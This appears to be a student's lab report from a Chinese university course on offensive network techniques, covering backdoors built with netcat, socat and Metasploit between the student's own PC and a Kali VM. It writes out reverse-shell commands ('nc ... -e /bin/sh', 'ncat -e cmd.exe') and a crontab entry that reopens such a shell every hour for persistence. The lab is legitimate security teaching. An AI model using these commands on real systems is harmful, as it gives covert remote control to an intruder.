2019-2020-3 20174314王方正《网络对抗技术》Exp2 后门原理与实践

一、实验概述

1.1 实验目标

掌握后门的概念,知道常见的后门种类,深入理解后门的运作原理。

掌握几种常见的后门工具,学会利用后门工具进行一些简单操作。

增强信息安全意识,认识到后门的危害性,提高对后门的防范意识。

1.2 实验内容

使用Netcat获取主机操作 Shell,cron启动。

使用socat获取主机操作Shell,任务计划启动。

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。

可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

二、实验准备

2.1 软件下载

https://gitee.com/wildlinux/NetSec/attach_files中,可以下载本次实验所需的ncat.rar和socat.rar。

将压缩包解压,放到指定的位置,即完成“安装”。

2.2 查询IP地址

在PC中的cmd中,使用ipconfig指令,得知PC机IP地址为192.168.1.194。

在Kali中打开终端,输入ip add,得知Kali端IP地址为192.168.133.130。

2.3 Win获得Linux Shell

在PC端打开cmd,输ncat -l -p 4314

在Kali端打开终端,输入nc 192.168.1.194 4314 -e /bin/sh

返回PC端,发现PC端成功攻击Kali端,输入ls测试,可以读取到Kali端的目录。

说明:PC端通过netcat对本机的4314端口进行监听,Kali端反弹连接PC端,若连接成功则执行命令行,故连接成功时PC端可以读取Kali端的目录。

2.4 Linux获得Windows Shell

在Kali端打开终端,输入nc -l -p 4314。

在PC端打开cmd,输入ncat -e cmd.exe 192.168.133.130 4314

2019-2020-3 20174314王方正《网络对抗技术》Exp2 后门原理与实践_第1张图片

返回Kali端,发现Kali端成功攻击PC端。

说明:Kali端通过nc指令对本机的4314端口进行监听,PC端反弹连接Kali端,如果连接成功则打开cmd,故连接成功时可以执行cmd。

2.5 netcat传输数据

在PC输入ncat -l 4314

在Kali端输入192.168.1.194 4314

稍后,连接成功,双方即可以相互通信。

说明:通过监听建立连接后,双方即可以开始通信。

2.6 netcat传输文件

在PC端输入ncat -l 4314 > 20174314.txt

在Kali端输入nc 192.168.1.194 4314 < PC_to_Kali.out

即可在Kali端查询到PC端传输的文件。

在Kali端输入nc -l 4314 > 20174314.txt

在PC端输入ncat 192.168.133.130 4314 < Kali_to_PC.out

即可在PC端查询到Kali端传输的文件。

说明:通过netcat可以进行文件的传输,需要注意的是,发方必须文件在对应目录,同时文件必须存在,而收方的文件名称甚至后缀都可以自行定义,并且自动生成。

三、实验步骤

3.1 使用 Netcat 获取主机操作 Shell ,cron 启动

Step1

在PC端,输入ncat -l -p 4314,回车。

在Kali端,输入crontab -e,回车,选择5,回车。

在Kali端,按i,在最后一行添加43 * * * * /bin/netcat 192.168.1.194 4314 -e /bin/sh,回车。

你可能感兴趣的:(2019-2020-3 20174314王方正《网络对抗技术》Exp2 后门原理与实践)